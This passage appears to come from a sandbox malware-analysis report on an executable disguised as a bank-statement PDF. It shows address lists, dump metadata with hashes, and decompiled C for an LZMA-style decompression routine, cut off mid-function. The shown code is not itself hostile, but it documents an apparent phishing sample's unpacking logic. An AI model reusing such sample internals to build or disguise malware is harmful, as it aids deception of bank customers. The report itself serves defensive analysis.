                                                                    0x00406f3a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406f75
                                                                    0x00406f75
                                                                    0x00406f79
                                                                    0x00407581
                                                                    0x00000000
                                                                    0x00407581
                                                                    0x00406f7f
                                                                    0x00406f82
                                                                    0x00406f85
                                                                    0x00406f89
                                                                    0x00406f8c
                                                                    0x00406f92
                                                                    0x00406f94
                                                                    0x00406f94
                                                                    0x00406f94
                                                                    0x00406f97
                                                                    0x00406f9a
                                                                    0x00406f9a
                                                                    0x00406fa0
                                                                    0x00406f3e
                                                                    0x00406f3e
                                                                    0x00406f41
                                                                    0x00000000
                                                                    0x00406f41
                                                                    0x00406fa2
                                                                    0x00406fa2
                                                                    0x00406fa5
                                                                    0x00406fa8
                                                                    0x00406fab
                                                                    0x00406fae
                                                                    0x00406fb1
                                                                    0x00406fb4
                                                                    0x00406fb7
                                                                    0x00406fba
                                                                    0x00406fbd
                                                                    0x00406fc0
                                                                    0x00406fd8
                                                                    0x00406fdb
                                                                    0x00406fde
                                                                    0x00406fe1
                                                                    0x00406fe1
                                                                    0x00406fe4
                                                                    0x00406fe8
                                                                    0x00406fea
                                                                    0x00406fc2
                                                                    0x00406fc2
                                                                    0x00406fca
                                                                    0x00406fcf
                                                                    0x00406fd1
                                                                    0x00406fd3
                                                                    0x00406fd3
                                                                    0x00406fed
                                                                    0x00406ff4
                                                                    0x00406ff7
                                                                    0x00000000
                                                                    0x00406ff9
                                                                    0x00000000
                                                                    0x00406ff9
                                                                    0x00000000
                                                                    0x00407286
                                                                    0x00407286
                                                                    0x0040728a
                                                                    0x004075b1
                                                                    0x00000000
                                                                    0x004075b1
                                                                    0x00407290
                                                                    0x00407293
                                                                    0x00407296
                                                                    0x0040729a
                                                                    0x0040729d
                                                                    0x004072a3
                                                                    0x004072a5
                                                                    0x004072a5
                                                                    0x004072a5
                                                                    0x004072a8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407056
                                                                    0x00407056
                                                                    0x00407059
                                                                    0x004073cb
                                                                    0x004073cb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407452
                                                                    0x00407456
                                                                    0x00407474
                                                                    0x00407474
                                                                    0x00407474
                                                                    0x0040747b
                                                                    0x00407482
                                                                    0x00000000
                                                                    0x00407482
                                                                    0x00407458
                                                                    0x0040745b
                                                                    0x0040745e
                                                                    0x00407461
                                                                    0x00407468
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407543
                                                                    0x00407546
                                                                    0x00407447
                                                                    0x00407447
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040717d
                                                                    0x0040717f
                                                                    0x00407186
                                                                    0x00407187
                                                                    0x00407189
                                                                    0x0040718c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407194
                                                                    0x00407197
                                                                    0x0040719a
                                                                    0x0040719c
                                                                    0x0040719e
                                                                    0x0040719e
                                                                    0x0040719f
                                                                    0x004071a2
                                                                    0x004071a9
                                                                    0x004071ac
                                                                    0x004071ba
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040749f
                                                                    0x0040749f
                                                                    0x004074a3
                                                                    0x004075db
                                                                    0x00000000
                                                                    0x004075db
                                                                    0x004074a9
                                                                    0x004074ac
                                                                    0x004074af
                                                                    0x004074b3
                                                                    0x004074b6
                                                                    0x004074bc
                                                                    0x004074be
                                                                    0x004074be
                                                                    0x004074be
                                                                    0x004074c1
                                                                    0x004074c4
                                                                    0x004074c4
                                                                    0x004074c4
                                                                    0x004074c4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004071c2
                                                                    0x004071c5
                                                                    0x004071fb
                                                                    0x0040732b
                                                                    0x0040732b
                                                                    0x0040732b
                                                                    0x0040732b
                                                                    0x0040732e
                                                                    0x0040732e
                                                                    0x00407331
                                                                    0x00407333
                                                                    0x004075bd
                                                                    0x00000000
                                                                    0x004075bd
                                                                    0x00407339
                                                                    0x0040733c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407342
                                                                    0x00407346
                                                                    0x00407349
                                                                    0x00407349
                                                                    0x00407349
                                                                    0x00000000
                                                                    0x00407349
                                                                    0x004071c7
                                                                    0x004071c9
                                                                    0x004071cb
                                                                    0x004071cd
                                                                    0x004071d0
                                                                    0x004071d1
                                                                    0x004071d3
                                                                    0x004071d5
                                                                    0x004071d8
                                                                    0x004071db
                                                                    0x004071f1
                                                                    0x004071f6
                                                                    0x0040722e
                                                                    0x0040722e
                                                                    0x00407232
                                                                    0x0040725e
                                                                    0x00407260
                                                                    0x00407267
                                                                    0x0040726a
                                                                    0x0040726d
                                                                    0x0040726d
                                                                    0x00407272
                                                                    0x00407272
                                                                    0x00407274
                                                                    0x00407277
                                                                    0x0040727e
                                                                    0x00407281
                                                                    0x004072ae
                                                                    0x004072ae
                                                                    0x004072b1
                                                                    0x004072b4
                                                                    0x00407328
                                                                    0x00407328
                                                                    0x00407328
                                                                    0x00000000
                                                                    0x00407328
                                                                    0x004072b6
                                                                    0x004072bc
                                                                    0x004072bf
                                                                    0x004072c2
                                                                    0x004072c5
                                                                    0x004072c8
                                                                    0x004072cb
                                                                    0x004072ce
                                                                    0x004072d1
                                                                    0x004072d4
                                                                    0x004072d7
                                                                    0x004072f0
                                                                    0x004072f2
                                                                    0x004072f5
                                                                    0x004072f6
                                                                    0x004072f9
                                                                    0x004072fb
                                                                    0x004072fe
                                                                    0x00407300
                                                                    0x00407302
                                                                    0x00407305
                                                                    0x00407307
                                                                    0x0040730a
                                                                    0x0040730e
                                                                    0x00407310
                                                                    0x00407310
                                                                    0x00407311
                                                                    0x00407314
                                                                    0x00407317
                                                                    0x004072d9
                                                                    0x004072d9
                                                                    0x004072e1
                                                                    0x004072e6
                                                                    0x004072e8
                                                                    0x004072eb
                                                                    0x004072eb
                                                                    0x0040731a
                                                                    0x00407321
                                                                    0x004072ab
                                                                    0x004072ab
                                                                    0x004072ab
                                                                    0x004072ab
                                                                    0x00000000
                                                                    0x00407323
                                                                    0x00000000
                                                                    0x00407323
                                                                    0x00407321
                                                                    0x00407234
                                                                    0x00407237
                                                                    0x00407239
                                                                    0x0040723c
                                                                    0x0040723f
                                                                    0x00407242
                                                                    0x00407244
                                                                    0x00407247
                                                                    0x0040724a
                                                                    0x0040724a
                                                                    0x0040724d
                                                                    0x0040724d
                                                                    0x00407250
                                                                    0x00407257
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x00000000
                                                                    0x00407259
                                                                    0x00000000
                                                                    0x00407259
                                                                    0x00407257
                                                                    0x004071dd
                                                                    0x004071e0
                                                                    0x004071e2
                                                                    0x004071e5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406f44
                                                                    0x00406f44
                                                                    0x00406f48
                                                                    0x0040758d
                                                                    0x00000000
                                                                    0x0040758d
                                                                    0x00406f4e
                                                                    0x00406f51
                                                                    0x00406f54
                                                                    0x00406f57
                                                                    0x00406f5a
                                                                    0x00406f5d
                                                                    0x00406f60
                                                                    0x00406f62
                                                                    0x00406f65
                                                                    0x00406f68
                                                                    0x00406f6b
                                                                    0x00406f6d
                                                                    0x00406f6d
                                                                    0x00406f6d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004070cf
                                                                    0x004070cf
                                                                    0x004070d3
                                                                    0x00407599
                                                                    0x00000000
                                                                    0x00407599
                                                                    0x004070d9
                                                                    0x004070dc
                                                                    0x004070df
                                                                    0x004070e2
                                                                    0x004070e4
                                                                    0x004070e4
                                                                    0x004070e4
                                                                    0x004070e7
                                                                    0x004070ea
                                                                    0x004070ed
                                                                    0x004070f0
                                                                    0x004070f3
                                                                    0x004070f6
                                                                    0x004070f7
                                                                    0x004070f9
                                                                    0x004070f9
                                                                    0x004070f9
                                                                    0x004070fc
                                                                    0x004070ff
                                                                    0x00407102
                                                                    0x00407105
                                                                    0x00407105
                                                                    0x00407105
                                                                    0x00407108
                                                                    0x0040710a
                                                                    0x0040710a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040734c
                                                                    0x0040734c
                                                                    0x0040734c
                                                                    0x00407350
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407356
                                                                    0x00407359
                                                                    0x0040735c
                                                                    0x0040735f
                                                                    0x00407361
                                                                    0x00407361
                                                                    0x00407361
                                                                    0x00407364
                                                                    0x00407367
                                                                    0x0040736a
                                                                    0x0040736d
                                                                    0x00407370
                                                                    0x00407373
                                                                    0x00407374
                                                                    0x00407376
                                                                    0x00407376
                                                                    0x00407376
                                                                    0x00407379
                                                                    0x0040737c
                                                                    0x0040737f
                                                                    0x00407382
                                                                    0x00407385
                                                                    0x00407389
                                                                    0x0040738b
                                                                    0x0040738e
                                                                    0x00000000
                                                                    0x00407390
                                                                    0x0040710d
                                                                    0x0040710d
                                                                    0x00000000
                                                                    0x0040710d
                                                                    0x0040738e
                                                                    0x004075c3
                                                                    0x004075e5
                                                                    0x004075eb
                                                                    0x004075ed
                                                                    0x004075f4
                                                                    0x004075f6
                                                                    0x004075fd
                                                                    0x00407601
                                                                    0x00000000
                                                                    0x00406bf2
                                                                    0x004075fa
                                                                    0x004075fa
                                                                    0x00000000
                                                                    0x004075fa
                                                                    0x00407447
                                                                    0x004074cd
                                                                    0x004074d3
                                                                    0x004074d6
                                                                    0x004074d9
                                                                    0x004074dc
                                                                    0x004074df
                                                                    0x004074e2
                                                                    0x004074e5
                                                                    0x004074e8
                                                                    0x004074ee
                                                                    0x00407507
                                                                    0x0040750a
                                                                    0x0040750d
                                                                    0x00407510
                                                                    0x00407514
                                                                    0x00407516
                                                                    0x00407517
                                                                    0x0040751a
                                                                    0x004074f0
                                                                    0x004074f0
                                                                    0x004074f8
                                                                    0x004074fd
                                                                    0x004074ff
                                                                    0x00407502
                                                                    0x00407502
                                                                    0x00407524
                                                                    0x00000000
                                                                    0x00407526
                                                                    0x00000000
                                                                    0x00407526
                                                                    0x00407524
                                                                    0x00000000
                                                                    0x00407399

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                    • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                                    • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                    • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 98%
                                                                    			E004070AB() {
                                                                    				unsigned short _t532;
                                                                    				signed int _t533;
                                                                    				void _t534;
                                                                    				void* _t535;
                                                                    				signed int _t536;
                                                                    				signed int _t565;
                                                                    				signed int _t568;
                                                                    				signed int _t589;
                                                                    				signed int* _t606;
                                                                    				void* _t613;
                                                                    
                                                                    				L0:
                                                                    				while(1) {
                                                                    					L0:
                                                                    					if( *(_t613 - 0x40) != 0) {
                                                                    						L89:
                                                                    						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                                    						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                                    						L69:
                                                                    						_t606 =  *(_t613 - 0x58);
                                                                    						 *(_t613 - 0x84) = 0x12;
                                                                    						L132:
                                                                    						 *(_t613 - 0x54) = _t606;
                                                                    						L133:
                                                                    						_t532 =  *_t606;
                                                                    						_t589 = _t532 & 0x0000ffff;
                                                                    						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                    						if( *(_t613 - 0xc) >= _t565) {
                                                                    							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                    							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                    							 *(_t613 - 0x40) = 1;
                                                                    							_t533 = _t532 - (_t532 >> 5);
                                                                    							 *_t606 = _t533;
                                                                    						} else {
                                                                    							 *(_t613 - 0x10) = _t565;
                                                                    							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                    							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                                    						}
                                                                    						if( *(_t613 - 0x10) >= 0x1000000) {
                                                                    							L139:
                                                                    							_t534 =  *(_t613 - 0x84);
                                                                    							L140:
                                                                    							 *(_t613 - 0x88) = _t534;
                                                                    							goto L1;
                                                                    						} else {
                                                                    							L137:
                                                                    							if( *(_t613 - 0x6c) == 0) {
                                                                    								 *(_t613 - 0x88) = 5;
                                                                    								goto L170;
                                                                    							}
                                                                    							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                    							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                    							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                    							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                    							goto L139;
                                                                    						}
                                                                    					} else {
                                                                    						if( *(__ebp - 0x60) == 0) {
                                                                    							L171:
                                                                    							_t536 = _t535 | 0xffffffff;
                                                                    							L172:
                                                                    							return _t536;
                                                                    						}
                                                                    						__eax = 0;
                                                                    						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                    						0 | _t258 = _t258 + _t258 + 9;
                                                                    						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                    						L75:
                                                                    						if( *(__ebp - 0x64) == 0) {
                                                                    							 *(__ebp - 0x88) = 0x1b;
                                                                    							L170:
                                                                    							_t568 = 0x22;
                                                                    							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                    							_t536 = 0;
                                                                    							goto L172;
                                                                    						}
                                                                    						__eax =  *(__ebp - 0x14);
                                                                    						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                    						if(__eax >=  *(__ebp - 0x74)) {
                                                                    							__eax = __eax +  *(__ebp - 0x74);
                                                                    						}
                                                                    						__edx =  *(__ebp - 8);
                                                                    						__cl =  *(__eax + __edx);
                                                                    						__eax =  *(__ebp - 0x14);
                                                                    						 *(__ebp - 0x5c) = __cl;
                                                                    						 *(__eax + __edx) = __cl;
                                                                    						__eax = __eax + 1;
                                                                    						__edx = 0;
                                                                    						_t274 = __eax %  *(__ebp - 0x74);
                                                                    						__eax = __eax /  *(__ebp - 0x74);
                                                                    						__edx = _t274;
                                                                    						__eax =  *(__ebp - 0x68);
                                                                    						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                    						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                    						_t283 = __ebp - 0x64;
                                                                    						 *_t283 =  *(__ebp - 0x64) - 1;
                                                                    						 *( *(__ebp - 0x68)) = __cl;
                                                                    						L79:
                                                                    						 *(__ebp - 0x14) = __edx;
                                                                    						L80:
                                                                    						 *(__ebp - 0x88) = 2;
                                                                    					}
                                                                    					L1:
                                                                    					_t535 =  *(_t613 - 0x88);
                                                                    					if(_t535 > 0x1c) {
                                                                    						goto L171;
                                                                    					}
                                                                    					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
                                                                    						case 0:
                                                                    							if( *(_t613 - 0x6c) == 0) {
                                                                    								goto L170;
                                                                    							}
                                                                    							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                    							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                    							_t535 =  *( *(_t613 - 0x70));
                                                                    							if(_t535 > 0xe1) {
                                                                    								goto L171;
                                                                    							}
                                                                    							_t539 = _t535 & 0x000000ff;
                                                                    							_push(0x2d);
                                                                    							asm("cdq");
                                                                    							_pop(_t570);
                                                                    							_push(9);
                                                                    							_pop(_t571);
                                                                    							_t609 = _t539 / _t570;
                                                                    							_t541 = _t539 % _t570 & 0x000000ff;
                                                                    							asm("cdq");
                                                                    							_t604 = _t541 % _t571 & 0x000000ff;
                                                                    							 *(_t613 - 0x3c) = _t604;
                                                                    							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                    							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                                    							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                    							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                    								L10:
                                                                    								if(_t612 == 0) {
                                                                    									L12:
                                                                    									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                    									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                    									goto L15;
                                                                    								} else {
                                                                    									goto L11;
                                                                    								}
                                                                    								do {
                                                                    									L11:
                                                                    									_t612 = _t612 - 1;
                                                                    									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                    								} while (_t612 != 0);
                                                                    								goto L12;
                                                                    							}
                                                                    							if( *(_t613 - 4) != 0) {
                                                                    								GlobalFree( *(_t613 - 4));
                                                                    							}
                                                                    							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                                    							 *(_t613 - 4) = _t535;
                                                                    							if(_t535 == 0) {
                                                                    								goto L171;
                                                                    							} else {
                                                                    								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                    								goto L10;
                                                                    							}
                                                                    						case 1:
                                                                    							L13:
                                                                    							__eflags =  *(_t613 - 0x6c);
                                                                    							if( *(_t613 - 0x6c) == 0) {
                                                                    								 *(_t613 - 0x88) = 1;
                                                                    								goto L170;
                                                                    							}
                                                                    							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                    							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                    							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                    							_t45 = _t613 - 0x48;
                                                                    							 *_t45 =  *(_t613 - 0x48) + 1;
                                                                    							__eflags =  *_t45;
                                                                    							L15:
                                                                    							if( *(_t613 - 0x48) < 4) {
                                                                    								goto L13;
                                                                    							}
                                                                    							_t547 =  *(_t613 - 0x40);
                                                                    							if(_t547 ==  *(_t613 - 0x74)) {
                                                                    								L20:
                                                                    								 *(_t613 - 0x48) = 5;
                                                                    								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                    								goto L23;
                                                                    							}
                                                                    							 *(_t613 - 0x74) = _t547;
                                                                    							if( *(_t613 - 8) != 0) {
                                                                    								GlobalFree( *(_t613 - 8));
                                                                    							}
                                                                    							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                    							 *(_t613 - 8) = _t535;
                                                                    							if(_t535 == 0) {
                                                                    								goto L171;
                                                                    							} else {
                                                                    								goto L20;
                                                                    							}
                                                                    						case 2:
                                                                    							L24:
                                                                    							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                    							 *(_t613 - 0x84) = 6;
                                                                    							 *(_t613 - 0x4c) = _t554;
                                                                    							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                                    							goto L132;
                                                                    						case 3:
                                                                    							L21:
                                                                    							__eflags =  *(_t613 - 0x6c);
                                                                    							if( *(_t613 - 0x6c) == 0) {
                                                                    								 *(_t613 - 0x88) = 3;
                                                                    								goto L170;
                                                                    							}
                                                                    							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                    							_t67 = _t613 - 0x70;
                                                                    							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                    							__eflags =  *_t67;
                                                                    							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                    							L23:
                                                                    							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                    							if( *(_t613 - 0x48) != 0) {
                                                                    								goto L21;
                                                                    							}
                                                                    							goto L24;
                                                                    						case 4:
                                                                    							goto L133;
                                                                    						case 5:
                                                                    							goto L137;
                                                                    						case 6:
                                                                    							__edx = 0;
                                                                    							__eflags =  *(__ebp - 0x40);
                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                    								__eax =  *(__ebp - 4);
                                                                    								__ecx =  *(__ebp - 0x38);
                                                                    								 *(__ebp - 0x34) = 1;
                                                                    								 *(__ebp - 0x84) = 7;
                                                                    								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                    								goto L132;
                                                                    							}
                                                                    							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                    							__esi =  *(__ebp - 0x60);
                                                                    							__cl = 8;
                                                                    							__cl = 8 -  *(__ebp - 0x3c);
                                                                    							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                    							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                    							__ecx =  *(__ebp - 0x3c);
                                                                    							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                    							__ecx =  *(__ebp - 4);
                                                                    							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                    							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                    							__eflags =  *(__ebp - 0x38) - 4;
                                                                    							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                    							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                    							if( *(__ebp - 0x38) >= 4) {
                                                                    								__eflags =  *(__ebp - 0x38) - 0xa;
                                                                    								if( *(__ebp - 0x38) >= 0xa) {
                                                                    									_t98 = __ebp - 0x38;
                                                                    									 *_t98 =  *(__ebp - 0x38) - 6;
                                                                    									__eflags =  *_t98;
                                                                    								} else {
                                                                    									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                    								}
                                                                    							} else {
                                                                    								 *(__ebp - 0x38) = 0;
                                                                    							}
                                                                    							__eflags =  *(__ebp - 0x34) - __edx;
                                                                    							if( *(__ebp - 0x34) == __edx) {
                                                                    								__ebx = 0;
                                                                    								__ebx = 1;
                                                                    								goto L61;
                                                                    							} else {
                                                                    								__eax =  *(__ebp - 0x14);
                                                                    								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                    								__eflags = __eax -  *(__ebp - 0x74);
                                                                    								if(__eax >=  *(__ebp - 0x74)) {
                                                                    									__eax = __eax +  *(__ebp - 0x74);
                                                                    									__eflags = __eax;
                                                                    								}
                                                                    								__ecx =  *(__ebp - 8);
                                                                    								__ebx = 0;
                                                                    								__ebx = 1;
                                                                    								__al =  *((intOrPtr*)(__eax + __ecx));
                                                                    								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                    								goto L41;
                                                                    							}
                                                                    						case 7:
                                                                    							__eflags =  *(__ebp - 0x40) - 1;
                                                                    							if( *(__ebp - 0x40) != 1) {
                                                                    								__eax =  *(__ebp - 0x24);
                                                                    								 *(__ebp - 0x80) = 0x16;
                                                                    								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                    								__eax =  *(__ebp - 0x28);
                                                                    								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                    								__eax =  *(__ebp - 0x2c);
                                                                    								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                    								__eax = 0;
                                                                    								__eflags =  *(__ebp - 0x38) - 7;
                                                                    								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                    								__al = __al & 0x000000fd;
                                                                    								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                    								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                    								__eax =  *(__ebp - 4);
                                                                    								__eax =  *(__ebp - 4) + 0x664;
                                                                    								__eflags = __eax;
                                                                    								 *(__ebp - 0x58) = __eax;
                                                                    								goto L69;
                                                                    							}
                                                                    							__eax =  *(__ebp - 4);
                                                                    							__ecx =  *(__ebp - 0x38);
                                                                    							 *(__ebp - 0x84) = 8;
                                                                    							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                    							goto L132;
                                                                    						case 8:
                                                                    							__eflags =  *(__ebp - 0x40);
                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                    								__eax =  *(__ebp - 4);
                                                                    								__ecx =  *(__ebp - 0x38);
                                                                    								 *(__ebp - 0x84) = 0xa;
                                                                    								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                    							} else {
                                                                    								__eax =  *(__ebp - 0x38);
                                                                    								__ecx =  *(__ebp - 4);
                                                                    								__eax =  *(__ebp - 0x38) + 0xf;
                                                                    								 *(__ebp - 0x84) = 9;
                                                                    								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                    								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                    							}
                                                                    							goto L132;
                                                                    						case 9:
                                                                    							goto L0;
                                                                    						case 0xa:
                                                                    							__eflags =  *(__ebp - 0x40);
                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                    								__eax =  *(__ebp - 4);
                                                                    								__ecx =  *(__ebp - 0x38);
                                                                    								 *(__ebp - 0x84) = 0xb;
                                                                    								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                    								goto L132;
                                                                    							}
                                                                    							__eax =  *(__ebp - 0x28);
                                                                    							goto L88;
                                                                    						case 0xb:
                                                                    							__eflags =  *(__ebp - 0x40);
                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                    								__ecx =  *(__ebp - 0x24);
                                                                    								__eax =  *(__ebp - 0x20);
                                                                    								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                    							} else {
                                                                    								__eax =  *(__ebp - 0x24);
                                                                    							}
                                                                    							__ecx =  *(__ebp - 0x28);
                                                                    							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                    							L88:
                                                                    							__ecx =  *(__ebp - 0x2c);
                                                                    							 *(__ebp - 0x2c) = __eax;
                                                                    							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                    							goto L89;
                                                                    						case 0xc:
                                                                    							L99:
                                                                    							__eflags =  *(__ebp - 0x6c);
                                                                    							if( *(__ebp - 0x6c) == 0) {
                                                                    								 *(__ebp - 0x88) = 0xc;
                                                                    								goto L170;
                                                                    							}
                                                                    							__ecx =  *(__ebp - 0x70);
                                                                    							__eax =  *(__ebp - 0xc);
                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							_t334 = __ebp - 0x70;
                                                                    							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                    							__eflags =  *_t334;
